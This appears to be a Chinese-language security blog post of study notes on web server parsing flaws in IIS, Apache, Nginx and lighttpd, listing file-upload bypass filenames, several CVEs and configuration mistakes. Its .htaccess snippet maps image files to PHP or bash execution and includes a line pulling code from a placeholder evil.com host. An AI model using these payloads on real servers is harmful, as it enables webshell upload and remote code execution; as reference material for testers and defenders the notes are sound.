<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="[TOC] IISIIS 6.0  后缀解析 &#x2F;xx.asp;.jpg 服务器默认不解析 ; 号及其后面的内容，相当于截断。    目录解析 &#x2F;xx.asp&#x2F;xx.jpg (xx.asp目录下任意解析)  默认解析 xx.asa xx.cer xx.cdx  PROPFIND 栈溢出漏洞  RCE CVE-2017-7269   IIS 7.0-7.5 &#x2F; Nginx &lt;&amp;#x3">
<meta property="og:type" content="article">
<meta property="og:title" content="中间件">
<meta property="og:url" content="http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/index.html">
<meta property="og:site_name" content="frozenfish">
<meta property="og:description" content="[TOC] IISIIS 6.0  后缀解析 &#x2F;xx.asp;.jpg 服务器默认不解析 ; 号及其后面的内容，相当于截断。    目录解析 &#x2F;xx.asp&#x2F;xx.jpg (xx.asp目录下任意解析)  默认解析 xx.asa xx.cer xx.cdx  PROPFIND 栈溢出漏洞  RCE CVE-2017-7269   IIS 7.0-7.5 &#x2F; Nginx &lt;&amp;#x3">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-12-25T18:01:50.000Z">
<meta property="article:modified_time" content="2023-12-27T13:47:49.610Z">
<meta property="article:author" content="frozenfish">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>中间件</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/12/26/%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/12/26/xpath/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&text=中间件"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&is_video=false&description=中间件"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=中间件&body=Check out this article: http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&name=中间件&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&t=中间件"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#IIS"><span class="toc-number">1.</span> <span class="toc-text">IIS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#IIS-6-0"><span class="toc-number">1.1.</span> <span class="toc-text">IIS 6.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IIS-7-0-7-5-Nginx"><span class="toc-number">1.2.</span> <span class="toc-text">IIS 7.0-7.5 &#x2F; Nginx &lt;&#x3D; 0.8.37</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PUT%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.3.</span> <span class="toc-text">PUT漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Windows%E7%89%B9%E6%80%A7"><span class="toc-number">1.4.</span> <span class="toc-text">Windows特性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D%E7%8C%9C%E8%A7%A3"><span class="toc-number">1.5.</span> <span class="toc-text">文件名猜解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Apache"><span class="toc-number">2.</span> <span class="toc-text">Apache</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E7%BC%80%E8%A7%A3%E6%9E%90"><span class="toc-number">2.1.</span> <span class="toc-text">后缀解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess"><span class="toc-number">2.2.</span> <span class="toc-text">htaccess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">2.3.</span> <span class="toc-text">目录遍历</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-2017-15715"><span class="toc-number">2.4.</span> <span class="toc-text">CVE-2017-15715</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-15-2-5-lighttpd"><span class="toc-number">2.5.</span> <span class="toc-text">4.15.2.5. lighttpd</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Nginx"><span class="toc-number">3.</span> <span class="toc-text">Nginx</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Fast-CGI%E5%85%B3%E9%97%AD"><span class="toc-number">3.1.</span> <span class="toc-text">Fast-CGI关闭</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Fast-CGI%E5%BC%80%E5%90%AF"><span class="toc-number">3.2.</span> <span class="toc-text">Fast-CGI开启</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-2013-4547"><span class="toc-number">3.3.</span> <span class="toc-text">CVE-2013-4547</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF"><span class="toc-number">3.4.</span> <span class="toc-text">配置错误</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A"><span class="toc-number">3.4.1.</span> <span class="toc-text">目录穿越</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86-1"><span class="toc-number">3.4.2.</span> <span class="toc-text">目录遍历</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        中间件
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">frozenfish</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-12-25T18:01:50.000Z" class="dt-published" itemprop="datePublished">2023-12-26</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <hr>
<p>[TOC]</p>
<h1 id="IIS"><a href="#IIS" class="headerlink" title="IIS"></a>IIS</h1><h2 id="IIS-6-0"><a href="#IIS-6-0" class="headerlink" title="IIS 6.0"></a>IIS 6.0</h2><ul>
<li><ul>
<li><p>后缀解析 <code>/xx.asp;.jpg</code></p>
<p>服务器默认不解析 <code>;</code> 号及其后面的内容，相当于截断。</p>
</li>
</ul>
</li>
<li><p>目录解析 <code>/xx.asp/xx.jpg</code> (xx.asp目录下任意解析)</p>
</li>
<li><p>默认解析 <code>xx.asa</code> <code>xx.cer</code> <code>xx.cdx</code></p>
</li>
<li><p>PROPFIND 栈溢出漏洞</p>
</li>
<li><p>RCE CVE-2017-7269</p>
</li>
</ul>
<h2 id="IIS-7-0-7-5-Nginx"><a href="#IIS-7-0-7-5-Nginx" class="headerlink" title="IIS 7.0-7.5 &#x2F; Nginx &lt;&#x3D; 0.8.37"></a>IIS 7.0-7.5 &#x2F; Nginx &lt;&#x3D; 0.8.37</h2><p>在Fast-CGI开启状态下，在文件路径后加上 <code>/xx.php</code> ，即 <code>xx.jpg/xx.php</code> 会被解析为php文件。</p>
<h2 id="PUT漏洞"><a href="#PUT漏洞" class="headerlink" title="PUT漏洞"></a>PUT漏洞</h2><ul>
<li>开启WebDAV</li>
<li>拥有来宾用户，且来宾用户拥有上传权限</li>
<li>可任意文件上传</li>
</ul>
<h2 id="Windows特性"><a href="#Windows特性" class="headerlink" title="Windows特性"></a>Windows特性</h2><p>Windows不允许空格和点以及一些特殊字符作为结尾，创建这样的文件会自动重命名，所以可以使用 <code>xx.php[空格]</code> ， <code>xx.php.</code>， <code>xx.php/</code>， <code>xx.php::$DATA</code> 上传脚本文件。</p>
<h2 id="文件名猜解"><a href="#文件名猜解" class="headerlink" title="文件名猜解"></a>文件名猜解</h2><p>在支持NTFS 8.3文件格式时，可利用短文件名猜解目录文件。其中短文件名特征如下：</p>
<ul>
<li>文件名为原文件名前6位字符加上 <code>~1</code> ，其中数字部分是递增的，如果存在前缀相同的文件，则后面的数字进行递增。</li>
<li>后缀名不超过3位，超过部分会被截断</li>
<li>所有小写字母均转换成大写的字母</li>
<li>文件名后缀长度大于等于4或者总长度大于等于9时才会生成短文件名，如果包含空格或者其他部分特殊字符，则无视长度条件</li>
</ul>
<p>IIS 8.0之前的版本支持短文件名猜测的HTTP方法主要包括：DEBUG、OPTIONS、GET、POST、HEAD、TRACE六种，需要安装ASP.NET。而IIS 8.0之后的版本只能通过OPTIONS和TRACE方法猜测成功，但是没有ASP.NET的限制。</p>
<p>这种方法的局限性在于：</p>
<ul>
<li>文件夹名前6位字符带点”.”，扫描程序会认为是文件而不是文件夹，最终出现误报</li>
<li>不支持中文文件名</li>
</ul>
<p>这种方法可以通过命令 <code>fsutil behavior set disable8dot3 1</code> 关闭NTFS 8.3文件格式的支持来修复。</p>
<h1 id="Apache"><a href="#Apache" class="headerlink" title="Apache"></a>Apache</h1><h2 id="后缀解析"><a href="#后缀解析" class="headerlink" title="后缀解析"></a>后缀解析</h2><p><code>test.php.x1.x2.x3</code> （ x1,x2,x3 为没有在 mime.types 文件中定义的文件类型）。Apache 将从右往左开始判断后缀， 若x3为非可识别后缀，则判断x2，直到找到可识别后缀为止，然后对可识别后缀进行解析</p>
<h2 id="htaccess"><a href="#htaccess" class="headerlink" title="htaccess"></a>htaccess</h2><p>当AllowOverride被启用时，上传启用解析规则的.htaccess</p>
<pre><code>AddType application/x-httpd-php .jpg
php_value auto_append_file .htaccess
#&lt;?php phpinfo();
Options ExecCGI
AddHandler cgi-script .jpg
Options +ExecCGI
AddHandler fcgid-script .gif
FcgidWrapper &quot;/bin/bash&quot; .gif
php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://evil.com/evil-code.txt
</code></pre>
<h2 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h2><p>配置 <code>Options +Indexes</code> 时Apache存在目录遍历漏洞。</p>
<h2 id="CVE-2017-15715"><a href="#CVE-2017-15715" class="headerlink" title="CVE-2017-15715"></a>CVE-2017-15715</h2><p><code>%0A</code> 绕过上传黑名单。</p>
<h2 id="4-15-2-5-lighttpd"><a href="#4-15-2-5-lighttpd" class="headerlink" title="4.15.2.5. lighttpd"></a>4.15.2.5. lighttpd</h2><pre><code>xx.jpg/xx.php
</code></pre>
<h1 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h1><h2 id="Fast-CGI关闭"><a href="#Fast-CGI关闭" class="headerlink" title="Fast-CGI关闭"></a>Fast-CGI关闭</h2><p>在Fast-CGI关闭的情况下， Nginx 仍然存在解析漏洞： 在文件路径(xx.jpg)后面加上 <code>%00.php</code> ， 即 <code>xx.jpg%00.php</code> 会被当做 php 文件来解析</p>
<h2 id="Fast-CGI开启"><a href="#Fast-CGI开启" class="headerlink" title="Fast-CGI开启"></a>Fast-CGI开启</h2><p>在Fast-CGI开启状态下，在文件路径后加上 <code>/xx.php</code> ，则 <code>xx.jpg/xx.php</code> 会被解析为php文件</p>
<h2 id="CVE-2013-4547"><a href="#CVE-2013-4547" class="headerlink" title="CVE-2013-4547"></a>CVE-2013-4547</h2><pre><code>a.jpg\x20\x00.php
</code></pre>
<h2 id="配置错误"><a href="#配置错误" class="headerlink" title="配置错误"></a>配置错误</h2><h3 id="目录穿越"><a href="#目录穿越" class="headerlink" title="目录穿越"></a>目录穿越</h3><p>如果配置中存在类似 <code>location /foo &#123; alias /bar/; &#125;</code> 的配置时，<code>/foo../</code> 会被解析为 <code>/bar/../</code> 从而导致目录穿越的发生。</p>
<h3 id="目录遍历-1"><a href="#目录遍历-1" class="headerlink" title="目录遍历"></a>目录遍历</h3><p>配置中 <code>autoindex on</code> 开启时，Nginx中存在目录遍历漏洞。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#IIS"><span class="toc-number">1.</span> <span class="toc-text">IIS</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#IIS-6-0"><span class="toc-number">1.1.</span> <span class="toc-text">IIS 6.0</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IIS-7-0-7-5-Nginx"><span class="toc-number">1.2.</span> <span class="toc-text">IIS 7.0-7.5 &#x2F; Nginx &lt;&#x3D; 0.8.37</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PUT%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.3.</span> <span class="toc-text">PUT漏洞</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Windows%E7%89%B9%E6%80%A7"><span class="toc-number">1.4.</span> <span class="toc-text">Windows特性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%90%8D%E7%8C%9C%E8%A7%A3"><span class="toc-number">1.5.</span> <span class="toc-text">文件名猜解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Apache"><span class="toc-number">2.</span> <span class="toc-text">Apache</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E7%BC%80%E8%A7%A3%E6%9E%90"><span class="toc-number">2.1.</span> <span class="toc-text">后缀解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#htaccess"><span class="toc-number">2.2.</span> <span class="toc-text">htaccess</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86"><span class="toc-number">2.3.</span> <span class="toc-text">目录遍历</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-2017-15715"><span class="toc-number">2.4.</span> <span class="toc-text">CVE-2017-15715</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4-15-2-5-lighttpd"><span class="toc-number">2.5.</span> <span class="toc-text">4.15.2.5. lighttpd</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Nginx"><span class="toc-number">3.</span> <span class="toc-text">Nginx</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Fast-CGI%E5%85%B3%E9%97%AD"><span class="toc-number">3.1.</span> <span class="toc-text">Fast-CGI关闭</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Fast-CGI%E5%BC%80%E5%90%AF"><span class="toc-number">3.2.</span> <span class="toc-text">Fast-CGI开启</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CVE-2013-4547"><span class="toc-number">3.3.</span> <span class="toc-text">CVE-2013-4547</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E9%94%99%E8%AF%AF"><span class="toc-number">3.4.</span> <span class="toc-text">配置错误</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E7%A9%BF%E8%B6%8A"><span class="toc-number">3.4.1.</span> <span class="toc-text">目录穿越</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86-1"><span class="toc-number">3.4.2.</span> <span class="toc-text">目录遍历</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&text=中间件"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&is_video=false&description=中间件"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=中间件&body=Check out this article: http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&title=中间件"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&name=中间件&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/12/26/%E4%B8%AD%E9%97%B4%E4%BB%B6/&t=中间件"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    frozenfish
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/probberechts">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
